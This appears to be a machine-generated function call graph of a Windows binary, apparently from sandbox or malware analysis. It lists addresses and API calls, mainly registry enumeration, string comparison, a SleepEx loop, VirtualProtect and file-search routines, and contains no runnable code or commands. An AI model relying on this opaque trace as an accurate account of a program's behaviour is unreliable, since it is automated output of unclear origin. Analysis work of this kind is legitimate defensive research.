GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16432->16494 16434 19291621781 16495 19291621000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 16434->16495 16436 1929162178a RegOpenKeyExW 16437 192916219a2 16436->16437 16438 192916217bc RegOpenKeyExW 16436->16438 16437->16415 16439 192916217e5 16438->16439 16440 192916217fb RegOpenKeyExW 16438->16440 16496 192916212b8 RegQueryInfoKeyW 16439->16496 16442 19291621836 RegOpenKeyExW 16440->16442 16443 1929162181f 16440->16443 16446 1929162185a 16442->16446 16447 19291621871 RegOpenKeyExW 16442->16447 16505 1929162104c RegQueryInfoKeyW 16443->16505 16451 192916212b8 16 API calls 16446->16451 16448 19291621895 16447->16448 16449 192916218ac RegOpenKeyExW 16447->16449 16452 192916212b8 16 API calls 16448->16452 16453 192916218e7 RegOpenKeyExW 16449->16453 16454 192916218d0 16449->16454 16455 19291621867 RegCloseKey 16451->16455 16456 192916218a2 RegCloseKey 16452->16456 16458 19291621922 RegOpenKeyExW 16453->16458 16459 1929162190b 16453->16459 16457 192916212b8 16 API calls 16454->16457 16455->16447 16456->16449 16460 192916218dd RegCloseKey 16457->16460 16462 19291621946 16458->16462 16463 1929162195d RegOpenKeyExW 16458->16463 16461 1929162104c 6 API calls 16459->16461 16460->16453 16466 19291621918 RegCloseKey 16461->16466 16467 1929162104c 6 API calls 16462->16467 16464 19291621998 RegCloseKey 16463->16464 16465 19291621981 16463->16465 16464->16437 16468 1929162104c 6 API calls 16465->16468 16466->16458 16469 19291621953 RegCloseKey 16467->16469 16470 1929162198e RegCloseKey 16468->16470 16469->16463 16470->16464 16510 192916214a0 16471->16510 16488->16422 16489->16424 16490->16426 16491->16428 16492->16430 16493->16432 16494->16434 16495->16436 16497 19291621323 GetProcessHeap HeapAlloc 16496->16497 16498 19291621486 RegCloseKey 16496->16498 16499 19291621472 GetProcessHeap HeapFree 16497->16499 16500 1929162134e RegEnumValueW 16497->16500 16498->16440 16499->16498 16501 192916213a1 16500->16501 16501->16499 16501->16500 16502 19291621530 2 API calls 16501->16502 16503 1929162141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 16501->16503 16504 192916213cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 16501->16504 16502->16501 16503->16501 16504->16503 16506 192916211b5 RegCloseKey 16505->16506 16508 192916210bf 16505->16508 16506->16442 16507 192916210cf RegEnumValueW 16507->16508 16508->16506 16508->16507 16509 1929162114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 16508->16509 16509->16508 16511 192916214e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 16510->16511 16512 192916214c2 GetProcessHeap HeapFree 16510->16512 16512->16511 16512->16512 18298 192913ec180 18301 192913ebf38 18298->18301 18308 192913ebf00 18301->18308 18306 192913ebebc 13 API calls 18307 192913ebf6b 18306->18307 18309 192913ebf10 18308->18309 18310 192913ebf15 18308->18310 18311 192913ebebc 13 API calls 18309->18311 18312 192913ebf1c 18310->18312 18311->18310 18313 192913ebf31 18312->18313 18314 192913ebf2c 18312->18314 18313->18306 18315 192913ebebc 13 API calls 18314->18315 18315->18313 15174 192913f387c 15176 192913f38b4 __GSHandlerCheckCommon 15174->15176 15175 192913f38e0 15176->15175 15178 192913e9a24 15176->15178 15185 192913e9324 15178->15185 15180 192913e9a4e 15181 192913e9324 __CxxCallCatchBlock 9 API calls 15180->15181 15182 192913e9a5b 15181->15182 15183 192913e9324 __CxxCallCatchBlock 9 API calls 15182->15183 15184 192913e9a64 15183->15184 15184->15175 15188 192913e9340 15185->15188 15187 192913e932d 15187->15180 15189 192913e935f GetLastError 15188->15189 15190 192913e9358 15188->15190 15200 192913e9c8c 15189->15200 15190->15187 15204 192913e9aac 15200->15204 15205 192913e9b96 TlsGetValue 15204->15205 15207 192913e9af0 __vcrt_FlsAlloc 15204->15207 15206 192913e9b1e LoadLibraryExW 15208 192913e9b3f GetLastError 15206->15208 15209 192913e9bbd 15206->15209 15207->15205 15207->15206 15210 192913e9bdd GetProcAddress 15207->15210 15212 192913e9b61 LoadLibraryExW 15207->15212 15208->15207 15209->15210 15211 192913e9bd4 FreeLibrary 15209->15211 15210->15205 15211->15210 15212->15207 15212->15209 18316 192913e5974 18317 192913e597a 18316->18317 18328 192913e7fa0 18317->18328 18321 192913e59de 18323 192913e5a77 18323->18321 18325 192913e5bfd 18323->18325 18341 192913e7b80 18323->18341 18324 192913e5cfb 18325->18324 18326 192913e5d77 VirtualProtect 18325->18326 18326->18321 18327 192913e5da3 GetLastError 18326->18327 18327->18321 18329 192913e7fab 18328->18329 18330 192913e59bd 18329->18330 18331 192913eb470 __std_exception_copy 2 API calls 18329->18331 18332 192913e7fca 18329->18332 18330->18321 18337 192913e4400 18330->18337 18331->18329 18333 192913e7fd5 18332->18333 18347 192913e87b8 18332->18347 18351 192913e87d8 18333->18351 18338 192913e441d 18337->18338 18340 192913e448c 18338->18340 18355 192913e4670 18338->18355 18340->18323 18342 192913e7bc7 18341->18342 18380 192913e7950 18342->18380 18345 192913e8070 _invalid_parameter_noinfo 8 API calls 18346 192913e7bf1 18345->18346 18346->18323 18348 192913e87c6 std::bad_alloc::bad_alloc 18347->18348 18349 192913e9178 Concurrency::cancel_current_task 2 API calls 18348->18349 18350 192913e87d7 18349->18350 18352 192913e87e6 std::bad_alloc::bad_alloc 18351->18352 18353 192913e9178 Concurrency::cancel_current_task 2 API calls 18352->18353 18354 192913e7fdb 18353->18354 18357 192913e4694 18355->18357 18360 192913e46b7 18355->18360 18356 192913e46ed 18358 192913e471d 18356->18358 18364 192913e4250 2 API calls 18356->18364 18357->18360 18369 192913e4120 18357->18369 18362 192913e4753 18358->18362 18367 192913e4120 3 API calls 18358->18367 18360->18356 18375 192913e4250 18360->18375 18363 192913e476f 18362->18363 18365 192913e4120 3 API calls 18362->18365 18366 192913e478b 18363->18366 18368 192913e4250 2 API calls 18363->18368 18364->18358 18365->18363 18366->18340 18367->18362 18368->18366 18374 192913e4141 18369->18374 18370 192913e41b0 18370->18360 18371 192913e4196 VirtualQuery 18371->18370 18371->18374 18372 192913e41ca VirtualAlloc 18372->18370 18373 192913e41fb GetLastError 18372->18373 18373->18370 18373->18374 18374->18370 18374->18371 18374->18372 18378 192913e4268 18375->18378 18376 192913e42bd VirtualQuery 18377 192913e42d7 18376->18377 18376->18378 18377->18356 18378->18376 18378->18377 18379 192913e4322 GetLastError 18378->18379 18379->18378 18381 192913e796b 18380->18381 18382 192913e7981 SetLastError 18381->18382 18383 192913e798f 18381->18383 18382->18383 18383->18345 17056 192913e8672 17057 192913e90c0 __std_exception_copy 38 API calls 17056->17057 17058 192913e869d 17057->17058 15213 192913ef870 15214 192913ef8a0 15213->15214 15216 192913ef8c7 15213->15216 15214->15216 15221 192913ef8b4 15214->15221 15236 192913ecb10 15214->15236 15217 192913ef99c 15216->15217 15251 192913ec558 EnterCriticalSection 15216->15251 15220 192913efab3 15217->15220 15222 192913efa03 15217->15222 15229 192913ef9ca 15217->15229 15218 192913ef904 15223 192913efac0 15220->15223 15261 192913ec5ac LeaveCriticalSection 15220->15261 15221->15216 15221->15218 15224 192913ef949 15221->15224 15234 192913efa61 15222->15234 15260 192913ec5ac LeaveCriticalSection 15222->15260 15245 192913ed1f4 15224->15245 15229->15222 15252 192913ecab0 15229->15252 15232 192913ecab0 14 API calls _invalid_parameter_noinfo 15232->15234 15233 192913ef9f3 15235 192913ecab0 _invalid_parameter_noinfo 14 API calls 15233->15235 15234->15232 15235->15222 15237 192913ecb59 GetLastError 15236->15237 15238 192913ecb2f __std_exception_copy 15236->15238 15242 192913ecb6c 15237->15242 15240 192913ecb54 15238->15240 15262 192913ec940 GetLastError 15238->15262 15239 192913ecb8a SetLastError 15239->15240 15240->15221 15241 192913ecb87 15241->15239 15242->15239 15242->15241 15244 192913ec940 __std_exception_copy 11 API calls 15242->15244 15244->15241 15246 192913ecb10 __std_exception_copy 13 API calls 15245->15246 15247 192913ed1fd 15246->15247 15248 192913ed04c 15247->15248 15321 192913ecef8 15248->15321 15253 192913ecb10 __std_exception_copy 13 API calls 15252->15253 15255 192913ecab9 15253->15255 15254 192913ecabe 15254->15233 15255->15254 15256 192913ecae8 FlsGetValue 15255->15256 15258 192913ecae4 15255->15258 15256->15258 15257 192913ecafe 15257->15233 15258->15257 15259 192913ec940 __std_exception_copy 13 API calls 15258->15259 15259->15257 15263 192913ec966 15262->15263 15264 192913ec96c SetLastError 15263->15264 15280 192913ed220 15263->15280 15265 192913ec9e5 15264->15265 15265->15240 15268 192913ec9a5 FlsSetValue 15271 192913ec9b1 FlsSetValue 15268->15271 15272 192913ec9c8 15268->15272 15269 192913ec995 FlsSetValue 15287 192913ed2a0 15269->15287 15274 192913ed2a0 __free_lconv_num 7 API calls 15271->15274 15293 192913ec758 15272->15293 15276 192913ec9c6 SetLastError 15274->15276 15276->15265 15286 192913ed231 __std_exception_copy 15280->15286 15281 192913ed282 15283 192913ed1f4 __std_exception_copy 12 API calls 15281->15283 15282 192913ed266 HeapAlloc 15284 192913ec987 15282->15284 15282->15286 15283->15284 15284->15268 15284->15269 15286->15281 15286->15282 15298 192913eb470 15286->15298 15288 192913ec9a3 15287->15288 15289 192913ed2a5 HeapFree 15287->15289 15288->15264 15289->15288 15290 192913ed2c0 GetLastError 15289->15290 15291 192913ed2cd __free_lconv_num 15290->15291 15292 192913ed1f4 __std_exception_copy 11 API calls 15291->15292 15292->15288 15307 192913ec630 15293->15307 15301 192913eb4c0 15298->15301 15306 192913ec558 EnterCriticalSection 15301->15306 15319 192913ec558 EnterCriticalSection 15307->15319 15322 192913ecf23 15321->15322 15329 192913ecf94 15322->15329 15324 192913ecf4a 15325 192913ecf6d 15324->15325 15339 192913ec3e0 15324->15339 15327 192913ecf82 15325->15327 15328 192913ec3e0 _invalid_parameter_noinfo 17 API calls 15325->15328 15327->15218 15328->15327 15352 192913eccc8 15329->15352 15334 192913ecfcf 15334->15324 15340 192913ec3ef GetLastError 15339->15340 15341 192913ec438 15339->15341 15342 192913ec404 15340->15342 15341->15325 15343 192913ecba0 _invalid_parameter_noinfo 14 API calls 15342->15343 15344 192913ec41e SetLastError 15343->15344 15344->15341 15345 192913ec441 15344->15345 15346 192913ec3e0 _invalid_parameter_noinfo 15 API calls 15345->15346 15347 192913ec467 15346->15347 15392 192913effe8 15347->15392 15353 192913ecd1f 15352->15353 15354 192913ecce4 GetLastError 15352->15354 15353->15334 15358 192913ecd34 15353->15358 15355 192913eccf4 15354->15355 15365 192913ecba0 15355->15365 15359 192913ecd50 GetLastError SetLastError 15358->15359 15360 192913ecd68 15358->15360 15359->15360 15360->15334 15361 192913ed06c IsProcessorFeaturePresent 15360->15361 15362 192913ed07f 15361->15362 15370 192913ecd80 15362->15370 15366 192913ecbc8 FlsGetValue 15365->15366 15368 192913ecbc4 15365->15368 15366->15368 15367 192913ecbde SetLastError 15367->15353 15368->15367 15369 192913ec940 __std_exception_copy 13 API calls 15368->15369 15369->15367 15371 192913ecdba _invalid_parameter_noinfo 15370->15371 15372 192913ecde2 RtlCaptureContext RtlLookupFunctionEntry 15371->15372 15373 192913ece2e RtlVirtualUnwind 15372->15373 15374 192913ece64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15372->15374 15373->15374 15375 192913eceb6 _invalid_parameter_noinfo 15374->15375 15378 192913e8070 15375->15378 15379 192913e8079 15378->15379 15380 192913e8084 GetCurrentProcess TerminateProcess 15379->15380 15381 192913e8848 IsProcessorFeaturePresent 15379->15381 15382 192913e8860 15381->15382 15387 192913e891c RtlCaptureContext 15382->15387 15388 192913e8936 RtlLookupFunctionEntry 15387->15388 15389 192913e894c RtlVirtualUnwind 15388->15389 15390 192913e8873 15388->15390 15389->15388 15389->15390 15391 192913e8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15390->15391 15393 192913f0001 15392->15393 15394 192913ec48f 15392->15394 15393->15394 15400 192913f0a40 15393->15400 15396 192913f0054 15394->15396 15397 192913f006d 15396->15397 15398 192913ec49f 15396->15398 15397->15398 15410 192913ee8c4 15397->15410 15398->15325 15401 192913ecab0 _invalid_parameter_noinfo 14 API calls 15400->15401 15402 192913f0a4f 15401->15402 15408 192913f0a95 15402->15408 15409 192913ec558 EnterCriticalSection 15402->15409 15408->15394 15411 192913ecab0 _invalid_parameter_noinfo 14 API calls 15410->15411 15412 192913ee8cd 15411->15412 16527 192913ef370 VirtualProtect 16553 192913e7f60 16554 192913e7f81 16553->16554 16555 192913e7f7c 16553->16555 16557 192913e8090 16555->16557 16558 192913e8127 16557->16558 16559 192913e80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16557->16559 16558->16554 16559->16558 18387 192913f3960 18397 192913e8ca0 18387->18397 18389 192913f3988 18391 192913e9324 __CxxCallCatchBlock 9 API calls 18392 192913f3998 18391->18392 18393 192913e9324 __CxxCallCatchBlock 9 API calls 18392->18393 18394 192913f39a1 18393->18394 18395 192913ec2f4 14 API calls 18394->18395 18396 192913f39aa 18395->18396 18399 192913e8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 18397->18399 18398 192913e8dd1 18398->18389 18398->18391 18399->18398 18400 192913e8d94 RtlUnwindEx 18399->18400 18400->18399 17070 192913f465f 17071 192913f4677 17070->17071 17077 192913f46e2 17070->17077 17072 192913e9324 __CxxCallCatchBlock 9 API calls 17071->17072 17071->17077 17073 192913f46c4 17072->17073 17074 192913e9324 __CxxCallCatchBlock 9 API calls 17073->17074 17075 192913f46d9 17074->17075 17076 192913ec2f4 14 API calls 17075->17076 17076->17077 15413 192913f485e 15414 192913e9324 __CxxCallCatchBlock 9 API calls 15413->15414 15415 192913f486c 15414->15415 15416 192913f4877 15415->15416 15417 192913e9324 __CxxCallCatchBlock 9 API calls 15415->15417 15417->15416 17264 192913ed658 17265 192913ed67d 17264->17265 17270 192913ed694 17264->17270 17266 192913ed1f4 __std_exception_copy 13 API calls 17265->17266 17267 192913ed682 17266->17267 17269 192913ed04c _invalid_parameter_noinfo 38 API calls 17267->17269 17268 192913ed724 17396 192913ebb54 17268->17396 17272 192913ed68d 17269->17272 17270->17268 17279 192913ed6da 17270->17279 17281 192913ed7b6 17270->17281 17297 192913ed894 17270->17297 17359 192913eda18 17270->17359 17275 192913ed784 17278 192913ed2a0 __free_lconv_num 13 API calls 17275->17278 17277 192913ed836 17282 192913ed2a0 __free_lconv_num 13 API calls 17277->17282 17280 192913ed78b 17278->17280 17283 192913ed6fd 17279->17283 17287 192913ed2a0 __free_lconv_num 13 API calls 17279->17287 17280->17283 17288 192913ed2a0 __free_lconv_num 13 API calls 17280->17288 17281->17283 17286 192913ed2a0 __free_lconv_num 13 API calls 17281->17286 17285 192913ed841 17282->17285 17289 192913ed2a0 __free_lconv_num 13 API calls 17283->17289 17284 192913ed7d7 17284->17277 17284->17284 17294 192913ed87c 17284->17294 17402 192913f0eb8 17284->17402 17290 192913ed85a 17285->17290 17293 192913ed2a0 __free_lconv_num 13 API calls 17285->17293 17286->17281 17287->17279 17288->17280 17289->17272 17291 192913ed2a0 __free_lconv_num 13 API calls 17290->17291 17291->17272 17293->17285 17295 192913ed06c _invalid_parameter_noinfo 17 API calls 17294->17295 17296 192913ed891 17295->17296 17298 192913ed8c2 17297->17298 17298->17298 17299 192913ed8de 17298->17299 17300 192913ed220 __std_exception_copy 13 API calls 17298->17300 17299->17270 17301 192913ed90d 17300->17301 17302 192913ed926 17301->17302 17303 192913f0eb8 38 API calls 17301->17303 17304 192913f0eb8 38 API calls 17302->17304 17314 192913ed9fc 17302->17314 17303->17302 17305 192913ed943 17304->17305 17307 192913ed962 17305->17307 17311 192913ed98d 17305->17311 17305->17314 17326 192913ed97f 17305->17326 17306 192913ed06c _invalid_parameter_noinfo 17 API calls 17312 192913eda17 17306->17312 17308 192913ed220 __std_exception_copy 13 API calls 17307->17308 17313 192913ed96d 17308->17313 17309 192913ed2a0 __free_lconv_num 13 API calls 17309->17314 17310 192913ed977 17317 192913ed2a0 __free_lconv_num 13 API calls 17310->17317 17310->17326 17311->17310 17411 192913eeee0 17311->17411 17316 192913eda7a 17312->17316 17420 192913f13d8 17312->17420 17318 192913ed2a0 __free_lconv_num 13 API calls 17313->17318 17314->17306 17320 192913eda8c 17316->17320 17329 192913edaa1 17316->17329 17317->17326 17318->17310 17319 192913ed9b5 17321 192913ed9d0 17319->17321 17322 192913ed9ba 17319->17322 17325 192913ed894 52 API calls 17320->17325 17324 192913ed2a0 __free_lconv_num 13 API calls 17321->17324 17327 192913ed2a0 __free_lconv_num 13 API calls 17322->17327 17324->17326 17328 192913eda9c 17325->17328 17326->17309 17327->17310 17330 192913e8070 _invalid_parameter_noinfo 8 API calls 17328->17330 17331 192913edd78 14 API calls 17329->17331 17332 192913edd64 17330->17332 17333 192913edb0b 17331->17333 17332->17270 17334 192913edb1a 17333->17334 17429 192913ef198 17333->17429 17433 192913ed30c 17334->17433 17338 192913edba8 17339 192913ed894 52 API calls 17338->17339 17340 192913edbb8 17339->17340 17340->17328 17342 192913ed2a0 __free_lconv_num 13 API calls 17340->17342 17341 192913edd78 14 API calls 17347 192913edbd2 17341->17347 17342->17328 17343 192913ef198 9 API calls 17343->17347 17345 192913ed894 52 API calls 17345->17347 17346 192913edcc8 FindNextFileW 17346->17347 17349 192913edce0 17346->17349 17347->17341 17347->17343 17347->17345 17347->17346 17348 192913edd2a 17347->17348 17355 192913ed2a0 13 API calls __free_lconv_num 17347->17355 17455 192913ed4ac 17347->17455 17350 192913edd38 FindClose 17348->17350 17353 192913ed2a0 __free_lconv_num 13 API calls 17348->17353 17351 192913edd0c FindClose 17349->17351 17477 192913f0b20 17349->17477 17350->17328 17354 192913edd48 17350->17354 17351->17328 17352 192913edd1c 17351->17352 17357 192913ed2a0 __free_lconv_num 13 API calls 17352->17357 17353->17350 17358 192913ed2a0 __free_lconv_num 13 API calls 17354->17358 17355->17347 17357->17328 17358->17328 17360 192913eda7a 17359->17360 17361 192913eda58 17359->17361 17362 192913eda8c 17360->17362 17365 192913edaa1 17360->17365 17361->17360 17363 192913f13d8 38 API calls 17361->17363 17364 192913ed894 56 API calls 17362->17364 17363->17361 17378 192913eda9c 17364->17378 17367 192913edd78 14 API calls 17365->17367 17366 192913e8070 _invalid_parameter_noinfo 8 API calls 17368 192913edd64 17366->17368 17369 192913edb0b 17367->17369 17368->17270 17370 192913edb1a 17369->17370 17371 192913ef198 9 API calls 17369->17371 17372 192913ed30c 16 API calls 17370->17372 17371->17370 17373 192913edb7b FindFirstFileExW 17372->17373 17374 192913edba8 17373->17374 17384 192913edbd2 17373->17384 17375 192913ed894 56 API calls 17374->17375 17376 192913edbb8 17375->17376 17376->17378 17379 192913ed2a0 __free_lconv_num 13 API calls 17376->17379 17377 192913edd78 14 API calls 17377->17384 17378->17366 17379->17378 17380 192913ef198 9 API calls 17380->17384 17381 192913ed4ac 16 API calls 17381->17384 17382 192913ed894 56 API calls 17382->17384 17383 192913edcc8 FindNextFileW 17383->17384 17387 192913edce0 17383->17387 17384->17377 17384->17380 17384->17381 17384->17382 17384->17383 17385 192913ed2a0 13 API calls __free_lconv_num 17384->17385 17386 192913edd2a 17384->17386 17385->17384 17388 192913edd38 FindClose 17386->17388 17391 192913ed2a0 __free_lconv_num 13 API calls 17386->17391 17389 192913edd0c FindClose 17387->17389 17393 192913f0b20 38 API calls 17387->17393 17388->17378 17392 192913edd48 17388->17392 17389->17378 17390 192913edd1c 17389->17390 17394 192913ed2a0 __free_lconv_num 13 API calls 17390->17394 17391->17388 17395 192913ed2a0 __free_lconv_num 13 API calls 17392->17395 17393->17389 17394->17378 17395->17378 17397 192913ebb6c 17396->17397 17401 192913ebba4 17396->17401 17398 192913ed220 __std_exception_copy 13 API calls 17397->17398 17397->17401 17399 192913ebb9a 17398->17399 17400 192913ed2a0 __free_lconv_num 13 API calls 17399->17400 17400->17401 17401->17275 17401->17284 17405 192913f0ed5 17402->17405 17403 192913f0eda 17404 192913ed1f4 __std_exception_copy 13 API calls 17403->17404 17408 192913f0ef0 17403->17408 17410 192913f0ee4 17404->17410 17405->17403 17406 192913f0f24 17405->17406 17405->17408 17406->17408 17409 192913ed1f4 __std_exception_copy 13 API calls 17406->17409 17407 192913ed04c _invalid_parameter_noinfo 38 API calls 17407->17408 17408->17284 17409->17410 17410->17407 17412 192913eef1f 17411->17412 17413 192913eef02 17411->17413 17415 192913eef29 17412->17415 17485 192913f19f0 17412->17485 17413->17412 17414 192913eef10 17413->17414 17416 192913ed1f4 __std_exception_copy 13 API calls 17414->17416 17492 192913f1a40 17415->17492 17419 192913eef15 17416->17419 17419->17319 17421 192913f13e0 17420->17421 17422 192913f13f5 17421->17422 17424 192913f140e 17421->17424 17423 192913ed1f4 __std_exception_copy 13 API calls 17422->17423 17425 192913f13fa 17423->17425 17427 192913edd78 14 API calls 17424->17427 17428 192913f1405 17424->17428 17426 192913ed04c _invalid_parameter_noinfo 38 API calls 17425->17426 17426->17428 17427->17428 17428->17312 17430 192913ef1a9 17429->17430 17431 192913ef1ca 17429->17431 17430->17431 17432 192913eef88 9 API calls 17430->17432 17431->17334 17432->17431 17434 192913ed35a 17433->17434 17435 192913ed336 17433->17435 17436 192913ed3bf 17434->17436 17439 192913ed35f 17434->17439 17438 192913ed2a0 __free_lconv_num 13 API calls 17435->17438 17446 192913ed345 FindFirstFileExW 17435->17446 17437 192913eec58 MultiByteToWideChar 17436->17437 17449 192913ed3db 17437->17449 17438->17446 17440 192913ed374 17439->17440 17442 192913ed2a0 __free_lconv_num 13 API calls 17439->17442 17439->17446 17443 192913ec5d0 14 API calls 17440->17443 17441 192913ed3e2 GetLastError 17504 192913ed184 17441->17504 17442->17440 17443->17446 17445 192913ed420 17445->17446 17447 192913eec58 MultiByteToWideChar 17445->17447 17446->17338 17446->17347 17451 192913ed47a 17447->17451 17449->17441 17449->17445 17450 192913ed413 17449->17450 17453 192913ed2a0 __free_lconv_num 13 API calls 17449->17453 17454 192913ec5d0 14 API calls 17450->17454 17451->17441 17451->17446 17452 192913ed1f4 __std_exception_copy 13 API calls 17452->17446 17453->17450 17454->17445 17456 192913ed4fa 17455->17456 17457 192913ed4d6 17455->17457 17458 192913ed500 17456->17458 17459 192913ed55f 17456->17459 17460 192913ed2a0 __free_lconv_num 13 API calls 17457->17460 17464 192913ed4e5 17457->17464 17462 192913ed515 17458->17462 17458->17464 17465 192913ed2a0 __free_lconv_num 13 API calls 17458->17465 17461 192913eece8 WideCharToMultiByte 17459->17461 17460->17464 17472 192913ed583 17461->17472 17466 192913ec5d0 14 API calls 17462->17466 17463 192913ed58a GetLastError 17467 192913ed184 13 API calls 17463->17467 17464->17347 17465->17462 17466->17464 17470 192913ed597 17467->17470 17468 192913ed5c7 17468->17464 17469 192913eece8 WideCharToMultiByte 17468->17469 17473 192913ed629 17469->17473 17474 192913ed1f4 __std_exception_copy 13 API calls 17470->17474 17471 192913ed5bb 17476 192913ec5d0 14 API calls 17471->17476 17472->17463 17472->17468 17472->17471 17475 192913ed2a0 __free_lconv_num 13 API calls 17472->17475 17473->17463 17473->17464 17474->17464 17475->17471 17476->17468 17478 192913f0b52 17477->17478 17479 192913ed1f4 __std_exception_copy 13 API calls 17478->17479 17484 192913f0b67 17478->17484 17480 192913f0b5c 17479->17480 17481 192913ed04c _invalid_parameter_noinfo 38 API calls 17480->17481 17481->17484 17482 192913e8070 _invalid_parameter_noinfo 8 API calls 17483 192913f0ea8 17482->17483 17483->17351 17484->17482 17486 192913f19f9 17485->17486 17487 192913f1a12 HeapSize 17485->17487 17488 192913ed1f4 __std_exception_copy 13 API calls 17486->17488 17489 192913f19fe 17488->17489 17490 192913ed04c _invalid_parameter_noinfo 38 API calls 17489->17490 17491 192913f1a09 17490->17491 17491->17415 17493 192913f1a5f 17492->17493 17494 192913f1a55 17492->17494 17496 192913f1a64 17493->17496 17502 192913f1a6b __std_exception_copy 17493->17502 17495 192913ec5d0 14 API calls 17494->17495 17501 192913f1a5d 17495->17501 17499 192913ed2a0 __free_lconv_num 13 API calls 17496->17499 17497 192913f1a71 17500 192913ed1f4 __std_exception_copy 13 API calls 17497->17500 17498 192913f1a9e HeapReAlloc 17498->17501 17498->17502 17499->17501 17500->17501 17501->17419 17502->17497 17502->17498 17503 192913eb470 __std_exception_copy 2 API calls 17502->17503 17503->17502 17509 192913ed1d0 17504->17509 17506 192913ed191 __free_lconv_num 17507 192913ed1f4 __std_exception_copy 13 API calls 17506->17507 17508 192913ed1a1 17507->17508 17508->17452 17510 192913ecb10 __std_exception_copy 13 API calls 17509->17510 17511 192913ed1d9 17510->17511 17511->17506 17512 192913e2e54 17514 192913e2ea8 17512->17514 17513 192913e2ec3 17514->17513 17516 192913e37f4 17514->17516 17517 192913e388a 17516->17517 17520 192913e3819 17516->17520 17517->17513 17518 192913e3f88 StrCmpNIW 17518->17520 17519 192913e1e08 StrCmpIW StrCmpW 17519->17520 17520->17517 17520->17518 17520->17519 18469 192913f19d0 18470 192913ee864 56 API calls 18469->18470 18471 192913f19d9 18470->18471 16573 192913e5fcc 16574 192913e5fd3 16573->16574 16575 192913e6000 VirtualProtect 16574->16575 16577 192913e5f10 16574->16577 16576 192913e6029 GetLastError 16575->16576 16575->16577 16576->16577 15003 192913e1bc4 15010 192913e1724 GetProcessHeap HeapAlloc 15003->15010 15005 192913e1bda SleepEx 15006 192913e1724 50 API calls 15005->15006 15008 192913e1bd3 15006->15008 15008->15005 15009 192913e159c StrCmpIW StrCmpW 15008->15009 15061 192913e19b0 15008->15061 15009->15008 15078 192913e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15010->15078 15012 192913e174c 15079 192913e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15012->15079 15014 192913e1754 15080 192913e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15014->15080 15016 192913e175d 15081 192913e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15016->15081 15018 192913e1766 15082 192913e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15018->15082 15020 192913e176f 15083 192913e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15020->15083 15022 192913e1778 15084 192913e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15022->15084 15024 192913e1781 15085 192913e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15024->15085 15026 192913e178a RegOpenKeyExW 15027 192913e17bc RegOpenKeyExW 15026->15027 15028 192913e19a2 15026->15028 15029 192913e17fb RegOpenKeyExW 15027->15029 15030 192913e17e5 15027->15030 15028->15008 15031 192913e181f 15029->15031 15032 192913e1836 RegOpenKeyExW 15029->15032 15086 192913e12b8 RegQueryInfoKeyW 15030->15086 15095 192913e104c RegQueryInfoKeyW 15031->15095 15036 192913e1871 RegOpenKeyExW 15032->15036 15037 192913e185a 15032->15037 15040 192913e18ac RegOpenKeyExW 15036->15040 15041 192913e1895 15036->15041 15039 192913e12b8 16 API calls 15037->15039 15042 192913e1867 RegCloseKey 15039->15042 15044 192913e18d0 15040->15044 15045 192913e18e7 RegOpenKeyExW 15040->15045 15043 192913e12b8 16 API calls 15041->15043 15042->15036 15048 192913e18a2 RegCloseKey 15043->15048 15049 192913e12b8 16 API calls 15044->15049 15046 192913e190b 15045->15046 15047 192913e1922 RegOpenKeyExW 15045->15047 15051 192913e104c 6 API calls 15046->15051 15052 192913e195d RegOpenKeyExW 15047->15052 15053 192913e1946 15047->15053 15048->15040 15050 192913e18dd RegCloseKey 15049->15050 15050->15045 15054 192913e1918 RegCloseKey 15051->15054 15056 192913e1981 15052->15056 15057 192913e1998 RegCloseKey 15052->15057 15055 192913e104c 6 API calls 15053->15055 15054->15047 15058 192913e1953 RegCloseKey 15055->15058 15059 192913e104c 6 API calls 15056->15059 15057->15028 15058->15052 15060 192913e198e RegCloseKey 15059->15060 15060->15057 15105 192913e14a0 15061->15105 15078->15012 15079->15014 15080->15016 15081->15018 15082->15020 15083->15022 15084->15024 15085->15026 15087 192913e1486 RegCloseKey 15086->15087 15088 192913e1323 GetProcessHeap HeapAlloc 15086->15088 15087->15029 15089 192913e134e RegEnumValueW 15088->15089 15090 192913e1472 GetProcessHeap HeapFree 15088->15090 15091 192913e13a1 15089->15091 15090->15087 15091->15089 15091->15090 15093 192913e13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15091->15093 15094 192913e141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15091->15094 15100 192913e1530 15091->15100 15093->15094 15094->15091 15096 192913e10bf 15095->15096 15097 192913e11b5 RegCloseKey 15095->15097 15096->15097 15098 192913e10cf RegEnumValueW 15096->15098 15099 192913e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15096->15099 15097->15032 15098->15096 15099->15096 15101 192913e1580 15100->15101 15102 192913e154a 15100->15102 15101->15091 15102->15101 15103 192913e1561 StrCmpIW 15102->15103 15104 192913e1569 StrCmpW 15102->15104 15103->15102 15104->15102 15106 192913e14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15105->15106 15107 192913e14c2 GetProcessHeap HeapFree 15105->15107 15107->15106 15107->15107 16578 192913f47c2 16579 192913e9978 __CxxCallCatchBlock 9 API calls 16578->16579 16583 192913f47d5 16579->16583 16580 192913f4814 __CxxCallCatchBlock 16581 192913e9324 __CxxCallCatchBlock 9 API calls 16580->16581 16582 192913f4828 16581->16582 16584 192913e9324 __CxxCallCatchBlock 9 API calls 16582->16584 16583->16580 16586 192913e8ff8 __CxxCallCatchBlock 9 API calls 16583->16586 16585 192913f4838 16584->16585 16586->16580 